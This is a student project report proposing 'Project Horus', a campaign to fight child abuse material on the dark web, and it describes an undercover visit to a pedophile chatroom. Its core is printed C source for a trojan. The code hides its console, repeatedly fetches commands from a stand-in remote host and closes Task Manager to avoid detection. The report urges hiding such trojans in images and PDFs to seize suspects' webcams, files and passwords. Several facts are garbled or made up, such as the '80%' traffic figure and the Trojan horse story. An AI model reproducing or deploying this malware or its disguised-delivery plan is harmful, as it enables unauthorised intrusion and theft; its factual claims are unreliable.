CSR Mini Project

“Project Horus”
done by Anuraag Rath (RA1952001040075)

Introduction

The Internet is a place where Billions of people visit everyday. We access the Internet daily to
collect information, to interact and communicate with people and to be connected with everyone
over this common Network. We use search engines like Google, Bing and Yahoo to search for
information which we can access in split seconds. Using the Internet has become as common as
brushing our teeth or consuming food. But most of us do not know that there is a Dark side to the
Internet. This ‘DarkNet’ is another part of the Internet where illegal activities take place. The
“DarkNet” is a dangerous place on the Internet where illegal Drugs, weapons etc could be
purchased and services like Hiring Hitmen and Hackers can be done easily. It is the black market to
area of the Internet. The “DarkNet” was created during the same time the Internet was created by
the Military for their own purposes, but soon illegal activities started taking place and the sale of
Drugs, Weapons and even people started. The “DarkWeb” contains even more depraved content and
activities that could send shivers down your spine. In this place we see even Children are being sold
for sexual purposes. Child Pornography is extremely common on the DarkWeb where pornographic
content of children are sold. Children are kidnapped and sold to people on the Darkweb for
depraved reasons. Pedophiles thrive on the darkweb and exchange Child Pornographic content
openly. Anyone who knows how to navigate the DarkWeb could end up accessing such content.
Child trafficking often takes place over the DarkWeb where there are Auction Sites which
encourage people to purchase children online by bidding for the highest price. Many of these
children are forced to do such activities who are sold to older men for depraved activities.
Something is required to be done about this. So for Investigation purposes the darkweb has been
accessed by me to study as to how these activities take place and where people meet and discuss
about their fantasies on Children. So I have been investigating about Child Pornography and
Trafficking over the Darkweb for years now. There are methods to help limit this. The Darkweb is
used by Millions of people who do the same so stopping all of them would be a huge task. But this
has to start somewhere. The FBI and other Investigative departments have been trying to take down
these sites for decades. Hacker groups “Anonymous” is seen as a global hero to tackle this problem
and for taking down Tens of Thousands of such websites and revealing the identities of the
individuals who do such activities. But other top Organizations have better technologies and vast
resources to concentrate on this problem and help in stopping this once and for all. Top tech
Companies like Microsoft, Google, Facebook etc have the resources to aid in stopping and
revealing the identities of these hideous and disgusting people. But we must start doing this here in
India as well. Child Pornography and trafficking is very much common in our country where there
are dedicated Darknet groups and even Whatsapp Groups where such graphic content is being
shared and discussed upon. The number of Pedophiles in our Country is extremely high. Top
Companies like Reliance, TATA, Infosys etc could be approached to help provide the resources to
tackle this problem. These Companies could then provide help and information to the Investigative
departments to monitor and arrest these people. A deep state surveilance program could be launched
to monitor the activities of suspected individuals and the ones who take part in such conversations
and activities. This project is named Project Horus, named after the child God Horus of Egypt.

Objectives

• To help stop the distribution and sale of Child Pornographic content

• To help in stopping Child trafficking
 • To Monitor individuals who are suspects using surveillance programs
• To stop Pedophilia in our Country.
• To use resources of Organizations to effectively and efficiently track traffickers and
Pedophiles.
• Collaborate with the Investigative and Intelligence departments to track pedophiles.

Data Collection

WARNING: The following content could be very Graphic please proceed with caution
There is a lot of information out there on the web that would give you a good undestanding on how
dangerously this has gone out of hand. Most studies show that about 80% of the Dark/Deep web
traffic comes from Pedophilic content and activities. The numbers are very much shocking where
tens of thousands of images and videos are being shared online every hour. But here I will not be
going over the numbers. Instead a real hand experience would be provided on how depraved people
are on the Darkweb. An Investigative approach has been undergone by me for several years by me
in understanding on as to how these people operate. The following is an example of events
occurring over a few nights of such Investigative work.

The website/chat forum I had recently visited goes by the name of “The Public PedoPub”
In this chatroom, many pedophiles come together and share graphic content of Children being
sexually molested and the worst things that cannot be even imagined. I came across them and take
my word, you do not want to watch any of these images or videos. I will show the chats and texts of
people in this Chatroom who fantasize about molestation, rape etc and share actual content.

So at first as a test, I created a fake Alias who goes by the name “Ruck Witney”. And if u notice, no
one gave me any attention no matter how involved I was. You can see Pedophlic content being
shared by many people
But all of that changes when I go back in with a different Alias, who goes by the name “Linda
Parker”. The pedophiles came like bees and answered the questions I needed answers for.

I Introduce myself.

Then every person starts talking with me and interracting with me well because of having a lady’s
name. I take this opportunity to ask some questions and collect answers on their preferences.

“Make sure to read “bottom-up” first messages below and newer ones keep arriving on top.”
Now many people started talking with me. They started interracting and sending graphic content to
me and were asking for my opinions. I had to remain undercover for a few days and continued
acting like them so that my cover would not be blown. By seeing this we understand that these
people are easy to fool and not that smart. I have done this before which reaped successful results.

Things become too Graphic and abusive.

Then one by one people start answering my questions. And the results are pretty horrific.

Most of these pedophiles prefer children as young as 2 year olds. “Preteens” are preferred by these
pedophiles, as one individual mentioned it.
So with these few snaps anyone could get an idea on as to how horrific it is to visit the Darkweb. I
advice not to visit and investigate if you are not an expert or who has no knowledge on how to
protect themselves online and be completely anonymous. These are a very few examples on how
people are on the Darkweb. There are more snaps and content which have been reserved for
various purposes. Pedophilia has gotten way out of hand and something is required to be done to
help stop this.
CSR Activity Solution:

So how can we help stop this? The best thing that can be done is by using Ethical hacking methods
wherein we create Trojan Horses which can be sent to these individuals to gain access to their
systems. A Trojan Horse is a Program, a piece of code which when sent to the target would help us
gain access to their system by creating a backdoor in said system. A Trojan Horse can be sent to the
target which could be disguised as either an Image file or a PDF file. When the Target opens this
file, the trojan code would run in their background without their knowledge and install a backdoor
in their system. This way we can gain access to their webcam, their system files and folders, their
critical passwords etc. There are various tools which already exist and are made available for
Hackers for implementation. The name comes from the historical event when the Trojans sent a
Giant wooden horse to the Romans as a gift which later turned out to be a vessel where the army
stayed hidden, who attacked the Roman city at night.

By joining forces with top tech companies and by using their resources, these pedophiles could be
tracked, monitored and arrested.

The Following is a simple Trojan created using C.

there are many more steps and processes but this shows that the trojan Surveillance idea works
perfectly. An even more advanced program is to be created. The following is for techies to
understand on as to how a Trojan Horse works.
#include <windows.h>
#pragma comment(lib, "Winmm.lib")
#include <urlmon.h>
#pragma comment(lib, "urlmon.lib")
#include <iostream>
#include <fstream>
#include <WinInet.h>
#pragma comment(lib, "WinInet.lib")
#include <ShlObj.h>
using namespace std;
 
int Option, Assign, Target;
DWORD WINAPI LowProfile(LPVOID);
DWORD WINAPI Option1(LPVOID);
DWORD WINAPI Option2(LPVOID);
DWORD WINAPI Option3(LPVOID);
DWORD WINAPI Option4(LPVOID);
DWORD WINAPI Option5(LPVOID);
// Add more lines of Option6, Option7, etc. to create more commands.
HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS;
 
int main() {
// Hide Console Window
FreeConsole();
 
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL);
 
// Checks if assign.txt exists. If it doesn't (only first run), download assign.txt. This gives the computer an ID number. You can change assign.txt in the PHP file
BEFORE you plug in the U3 drive.
FILE *istream;
if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) {
    URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL);
} else {
}
 
// Store Assign.txt in a variable
ifstream inAssign;
inAssign.clear();
inAssign.open("c:\\Windows\\trojan\\assign.txt");
inAssign >> Assign;
inAssign.close();
inAssign.clear();
 
// Start the main loop that is downloading the textfile each 5 seconds.
while(1) {
 
    // Download Option & Target
    remove("c:\\Windows\\trojan\\option.txt");
    remove("c:\\Windows\\trojan\\target.txt");
    DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/");
    DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html");
    Sleep(100);
    URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL);
    URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL);
 
    // Read Option
    ifstream inFile;
    inFile.clear();
    inFile.open("c:\\Windows\\trojan\\option.txt");
    inFile >> Option;
    inFile.close();
    inFile.clear();
 
    // Read Target
    ifstream inTarget;
    inTarget.clear();
    inTarget.open("c:\\Windows\\trojan\\target.txt");
    inTarget >> Target;
    inTarget.close();
    inTarget.clear();
 
    // If Target is equal to assign (so you can target a single computer) or if Target is zero (target all computers with your trojan)
    if(Target == Assign || Target == 0) {
        if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); }
        else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); }
        else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); }
        else if(Option == 4) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); }
        else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); }
        // Add more of these lines for more commands
    }
    Sleep(5000);
    }
}
 
// Our LowProfile Thread. Hides all errors and things that may popup while inserting your U3 drive.
DWORD WINAPI LowProfile(LPVOID) {
    while(1) {
        // Obvious
        TaskMgr = FindWindow(NULL,L"Windows Task Manager");
        // May popup because of new hardware installation (U3)
        SysError = FindWindow(NULL,L"System Settings Change");
        // Windows Media Player may popup. Rarely happens, but had this once at a school computer.
        WMP = FindWindow(NULL,L"Windows Media Player");
        // The Removable Disk part of the U3 Drive can open automatically.
        Disk1 = FindWindow(NULL,L"(D:) Removable Disk");
        Disk2 = FindWindow(NULL,L"(E:) Removable Disk");
        Disk3 = FindWindow(NULL,L"(F:) Removable Disk");
        Disk4 = FindWindow(NULL,L"(G:) Removable Disk");
        // Autoplay
        Autoplay = FindWindow(NULL,L"Autoplay");
        // Errors caused by our VBScript go.vbs
        VBS = FindWindow(NULL,L"Windows Script Host");
        if( TaskMgr != NULL) {
            SetWindowText( TaskMgr,L"DIE!!!! =O");
            Sleep(500);
            PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        }
        if( SysError != NULL) {
            PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        }
        if( WMP != NULL) {
            Sleep(1000);
            PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        }
        if( Disk1 != NULL) {
            PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        }
        if( Disk2 != NULL) {
            PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        }
        if( Disk3 != NULL) {
            PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        }
        if( Disk4 != NULL) {
            PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        }
        if( Autoplay != NULL) {
            PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        }
        if( VBS != NULL) {
            PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        }
        Sleep(500);
    }
}
 
//
// Here we start with our commands. Option1, Option2, Option3, etc.
// Don't forget to also define and create a process for these Options if you want to create more.
// Have Fun =D
//
 
DWORD WINAPI Option1(LPVOID) { // 1
    return 0;
}
 
DWORD WINAPI Option2(LPVOID) { // 2
    return 0;
}
 
DWORD WINAPI Option3(LPVOID) { // 3
    return 0;
}
 
DWORD WINAPI Option4(LPVOID) { // 4
    return 0;
}
 
DWORD WINAPI Option5(LPVOID) { // 5
    return 0;
}
This is how Companies could make a difference by using good tech to find these disgusting
pedophiles and do justice. By smartly deceiving the pedophiles and sending them These trojans by
hiding them behind images and PDF files, we could gain access to their systems and the folders.
Access critical passwords etc and then take action on these people.

Conclusion:
By using effective resources with the help of Tech Companies and Government organizations,
Pedophiles could tracked who send graphic content and who sells Children over the DarkWeb.
Effective Trojan Horses could be used to monitor these people and establish and Surveillance
program to apprehend them and make the world a safer place for Children.